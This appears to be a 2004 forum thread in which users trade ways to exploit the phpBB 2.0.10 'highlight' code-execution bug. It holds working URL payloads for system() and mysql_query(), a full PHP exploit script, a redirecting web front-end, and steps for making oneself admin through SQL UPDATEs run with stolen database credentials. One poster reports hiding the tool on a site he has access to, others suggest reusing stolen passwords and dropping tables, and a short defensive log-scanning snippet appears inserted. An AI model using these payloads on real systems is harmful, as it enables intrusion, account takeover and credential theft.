IT Security and Insecurity Portal |
|
|
Re: a |
|
Posted: Tue Nov 23, 2004 5:23 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
SteX wrote: | What did you enter in the SQL tab..? |
I don't use SQL; I tested CMD commands, they work 100%
|
|
|
|
Posted: Tue Nov 23, 2004 9:20 pm |
|
|
Yomane |
Regular user |
|
|
Joined: Nov 23, 2004 |
Posts: 8 |
|
|
|
|
|
|
|
But can we execute an SQL query with mysql_query? Because I tried it and it doesn't work?!
Like this example:
Code: | &highlight=%2527.$poster=mysql_query(INSERT INTO phpbb_users VALUES %2910%2C1%2C"test"%2C"098f6bcd4621d373cade4e832627b4f6"%2C0%2C0%2C0%2C0%2C1%2C0%2C0%2C1%2CNULL%2C"d M Y H:i"%2C0%2C0%2C0%2CNULL%2CNULL%2CNULL%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2CNULL%2C0%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%29).%2527 |
And it's not supposed to work ? |
|
Last edited by Yomane on Fri Nov 26, 2004 1:23 am; edited 3 times in total |
|
|
|
Posted: Tue Nov 23, 2004 9:49 pm |
|
|
SteX |
Advanced user |
|
|
Joined: May 18, 2004 |
Posts: 181 |
Location: Serbia |
|
|
|
|
|
|
waraxe, where are you
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
|
getting admin |
|
Posted: Wed Nov 24, 2004 7:41 pm |
|
|
ReFleX |
Active user |
|
|
Joined: Nov 05, 2004 |
Posts: 39 |
Location: ARGENTINA! |
|
|
|
|
|
|
I was playing around with this. I see that there are people asking to get admin hashes. With the SQL injection in this exploit (mysql_query()) you can give yourself admin.
Just register a new user, get the UID of your new user (you can see it in the memberlist in the link of your user, &u=xxxx).
Then go to the exploit and complete the boxes (in the bottom part), and in SQL put this:
Code: |
UPDATE phpbb_users SET user_level=1 WHERE user_id=xxx
|
where xxx is YOUR UID
Then log in and you have admin.
If you haven't, maybe the prefix of the MySQL tables is different from "phpbb_".
You can see the prefix in the config.php file. So with the system() exploit you can get that file very easily (cat <path>/config.php)
So there you have admin
Also try the password of mysqlUser... so people (A LOT) use the same password for their FTPs, cPanels, shells, etc etc
OK, hope this helps someone
and sorry about my bad English |
|
|
|
|
|
|
|
|
Posted: Wed Nov 24, 2004 7:56 pm |
|
|
Yomane |
Regular user |
|
|
Joined: Nov 23, 2004 |
Posts: 8 |
|
|
|
|
|
|
|
Thank you ReFleX, but I imagine that it is possible to do it without the exploit program on howdark.com, no?!? |
|
|
|
|
Posted: Wed Nov 24, 2004 8:56 pm |
|
|
jessica |
Regular user |
|
|
Joined: Sep 18, 2004 |
Posts: 5 |
|
|
|
|
|
|
|
I took all of it down, it's gone.
I never got mysql_query to work, but theoretically it should have; I never gave it much testing. |
|
|
|
|
Posted: Wed Nov 24, 2004 9:31 pm |
|
|
SteX |
Advanced user |
|
|
Joined: May 18, 2004 |
Posts: 181 |
Location: Serbia |
|
|
|
|
|
|
What's happened with howdark.com..
Is there any similar "exploit" site, or does somebody have a backup of the "exploit" page??? |
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
|
ok |
|
Posted: Wed Nov 24, 2004 11:39 pm |
|
|
ReFleX |
Active user |
|
|
Joined: Nov 05, 2004 |
Posts: 39 |
Location: ARGENTINA! |
|
|
|
|
|
|
Ouch.... howdark is gone.... I hope it's gone for a while. I tried to do it manually but I can't do it, I don't have any guide to do it; the only one that I got to work is
Code: |
viewtopic.php?t=13&highlight=%2527%252esystem(l%252es)%252e%2527
|
It does an ls. I'll keep trying; I'll post any news I find.
If someone knows how to do this exploit manually, post the way and an explanation of it. |
|
|
|
|
|
|
|
|
Posted: Thu Nov 25, 2004 2:07 pm |
|
|
SteX |
Advanced user |
|
|
Joined: May 18, 2004 |
Posts: 181 |
Location: Serbia |
|
|
|
|
|
|
I found it..
But almost 99% of hosts don't have the curl extension...
Code: | #!/usr/bin/php -q
<?php
/*
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark (http://www.howdark.com) (1st October 2004)
#
# Requirement:
#
# PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/
if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}
if ($argv[2]){
$url = $argv[1];
$command = $argv[2];
}
else {
echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/html)\n";
echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
echo "\ttopic_id\t topic id\n";
echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
exit;
}
if ($argv[3])
$topic = $argv[3];
else
$topic = 1;
if ($argv[4])
$proxy = $argv[4];
$cmd = str2chr($command);
$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd.")%252e%2527";
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;
function str2chr($str){
for($i = 0;$i < strlen($str);$i++){
$chr .= "chr(".ord($str{$i}).")";
if ($i != strlen($str) -1)
$chr .= "%252e";
}
return $chr;
}
?> |
|
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
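Seen from the defending side, the requests quoted in this thread share one shape: a `highlight` value on viewtopic.php whose quote character only appears after a second percent-decode. The following log check is an added example, not code from the thread; the log lines are constructed, and the names `fully_decode`, `inspect_request` and `scan` are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (documentation IPs); only the second is hostile.
SAMPLE_LOG = """\
192.0.2.10 - - [24/Nov/2004:23:35:01 +0000] "GET /viewtopic.php?t=13&highlight=don%27t+panic HTTP/1.1" 200 5120
192.0.2.44 - - [24/Nov/2004:23:39:12 +0000] "GET /viewtopic.php?t=13&highlight=%2527%252esystem(l%252es)%252e%2527 HTTP/1.1" 200 9312
192.0.2.10 - - [24/Nov/2004:23:40:47 +0000] "GET /viewtopic.php?t=7&highlight=system+requirements HTTP/1.1" 200 4876
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Call names taken from the requests quoted in this thread, plus backticks.
CALL_RE = re.compile(r"\b(?:system|mysql_query|chr)\s*\(|`")

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def inspect_request(target):
    """Return the reasons a viewtopic.php highlight value looks hostile."""
    parts = urlsplit(target)
    if not parts.path.endswith("viewtopic.php"):
        return []
    reasons = []
    # parse_qsl does the first decode, as the web server and PHP would.
    for name, once in parse_qsl(parts.query, keep_blank_values=True):
        if name != "highlight":
            continue
        text, extra = fully_decode(once)
        if extra and "'" in text and "'" not in once:
            reasons.append("quote hidden behind extra percent-encoding")
        if CALL_RE.search(text):
            reasons.append("PHP call or backtick in highlight value")
    return reasons

def scan(log_text):
    """Return [(line_number, reasons)] for every flagged request."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        reasons = inspect_request(match.group(1)) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits
```

A legitimately quoted search such as `don%27t` is not flagged, because its quote is already visible after the first decode.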
|
|
|
|
|
|
|
Posted: Thu Nov 25, 2004 2:12 pm |
|
|
hebe |
Advanced user |
|
|
Joined: Sep 04, 2004 |
Posts: 59 |
|
|
|
|
|
|
|
yes
how can we drop all tables or inject a new admin hash |
|
|
|
|
|
|
|
|
Posted: Fri Nov 26, 2004 8:23 am |
|
|
DeNKo |
Beginner |
|
|
Joined: Nov 26, 2004 |
Posts: 1 |
|
|
|
|
|
|
|
First, excuse me if you don't understand me, because my English isn't too good.
I've been testing this bug and searching for a way to inject SQL code. A little while later, I think I've "discovered" a good way..
If we know the database host, user, pass and name.. why don't we try to execute mysql with those parameters to inject SQL code?
Example:
We have a phpBB forum which connects to the following database:
$dbhost=localhost
$dbname=victim_phpbb
$dbuser=victim_forum
$dbpass=aeiou
I'm using this method to execute shell commands..
/viewtopic.php?t=236&highlight=%2527.$poster=%60$ls%60.%2527&ls=[command]
There isn't anything unusual; we use $ls to ask for the shell command later with the &ls= parameter.
Now, using the database example, we can use the victim's mysql client to connect to the database and inject SQL code..
If we had a shell, we could inject SQL code with a single command line:
mysql -h localhost -u victim_forum --password=aeiou -D=victim_phpbb -e "UPDATE phpbb_users SET user_level=1 WHERE user_id=XXX"
If we want to do it using the bug, we should type something like this:
/viewtopic.php?t=236&highlight=%2527.$poster=%60$ls%60.%2527&ls=mysql%20-h%20localhost%20-u%20victim_forum%20--password=aeiou%20-D=victim_phpbb%20-e%20"UPDATE%20phpbb_users%20SET%20user_level=1%20WHERE%20user_id=100"
"-e" is the modifier which allows us to execute an SQL query
After that, we have admin privileges on our account. We can check it using the SQL query: SELECT user_level WHERE user_id=xxx
I hope it helps you... |
|
|
|
|
|
|
please |
|
Posted: Fri Nov 26, 2004 12:01 pm |
|
|
talmo11 |
Beginner |
|
|
Joined: Nov 06, 2004 |
Posts: 2 |
|
|
|
|
|
|
|
|
Last edited by talmo11 on Fri Nov 26, 2004 4:43 pm; edited 1 time in total |
|
|
|
|
Testing... |
|
Posted: Fri Nov 26, 2004 12:03 pm |
|
|
ReFleX |
Active user |
|
|
Joined: Nov 05, 2004 |
Posts: 39 |
Location: ARGENTINA! |
|
|
|
|
|
|
SteX... I'll test this PHP script now; if it works fine we could maybe change it to work in HTTP mode so we can upload it to some servers where I have access.
OK!... let's work |
|
|
|
|
|
OKEY! |
|
Posted: Fri Nov 26, 2004 12:51 pm |
|
|
ReFleX |
Active user |
|
|
Joined: Nov 05, 2004 |
Posts: 39 |
Location: ARGENTINA! |
|
|
|
|
|
|
OKEY guys, I made it!... Now we have to upload it; I have a few pages where I have access... maybe we can hide it there
But first I'll post the code so anyone can see it and tell if something is wrong. I didn't test the SQL injection but I think it works
Code: |
<?
/*
# Create by ReFleX
#
# Function str2chr by ** Selamat Hari Raya **
#
*/
$url = $_POST['url'];
$cmd = $_POST['cmd'];
$topic = $_POST['topicid'];
$a = $_GET['a'];
$cmd = str2chr($cmd);
if($a==1)
$getvars = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd.")%252e%2527";
else
$getvars = "/viewtopic.php?t=$topic&highlight=%2527%252emysql_query(".$cmd.")%252e%2527";
$fullurl = $url . $getvars;
if(isset($a))
header("Location: $fullurl");
else
echo "<b>Created by ReFleX</b>";
function str2chr($str){
for($i = 0;$i < strlen($str);$i++){
$chr .= "chr(".ord($str{$i}).")";
if ($i != strlen($str) -1)
$chr .= "%252e";
}
return $chr;
}
?>
|
I use the str2chr function from the script that SteX posted |
|
|
|
|
|
|
Uploading... |
|
Posted: Fri Nov 26, 2004 1:00 pm |
|
|
ReFleX |
Active user |
|
|
Joined: Nov 05, 2004 |
Posts: 39 |
Location: ARGENTINA! |
|
|
|
|
|
|
Okey, here I put the script
http://www.sururufitness.com/2bgal/stat/lang/
It's hidden....
It's equal to the other script from howdark, the same face. So just test it; I will upload it to other servers so we can have alternatives
I have to work, so in a few hours I'll make a tar with all the files of the exploit together
|
|
|
|
|
www.waraxe.us Forum Index -> PhpBB